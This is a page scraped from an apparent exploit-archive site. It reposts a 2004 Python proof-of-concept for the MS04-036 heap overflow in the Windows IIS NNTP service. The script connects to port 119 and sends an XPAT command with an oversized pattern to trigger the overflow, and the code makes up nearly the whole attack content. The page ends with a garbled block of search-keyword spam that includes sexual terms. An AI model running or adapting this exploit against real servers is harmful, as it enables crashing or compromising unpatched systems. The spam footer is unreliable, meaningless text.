about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft Windows NNTP Service XPAT command heap overflow Exploit (MS04-036)



2004-10-16 Microsoft Windows NNTP Service XPAT command heap overflow Exploit (MS04-036)
 

CAN-2004-0574

#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
#    Lucas Lavarello (lucas at coresecurity dot com)
#    Juliano Rizzo   (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE 
# FOR ANY DIRECT,  INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import * 

host = "127.0.0.1"
pat = "C"*1946  + " " + "X"*10

newsgroup = "control.newgroup"

sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))

print sock.recv(512)

sock.send("group %s\x0d\x0a" % newsgroup)

print sock.recv(512)

sock.send("xpat From 1-9 %s \x0d\x0a" % pat)
securitydot.net - 2004-10-16

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 23:52:07 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.sexpho m.../FX29I ir3x photo Kareena ka big titis Hollywoods Paristemi you ttbe music vide dora Guysex.com Www.Rashma news for C Sexy.video www.vipene user agent Www.sex18 parsian ph Seks vidio www,com89 net cafe s Clips front pag Manpreet t253t free sex v t437t FRE SEXX M i-gloo Blo Gayboys Www.fotopo Norton2008 www.80845. los amos d fox sexy maxcpm.inf egg mouvissex frontpage xxxmoives www.52yxbb t213t Dolphin Sm nude pictu Www.sexs v Wap.Indian Xxx sex ma Clips new 200 /compo dance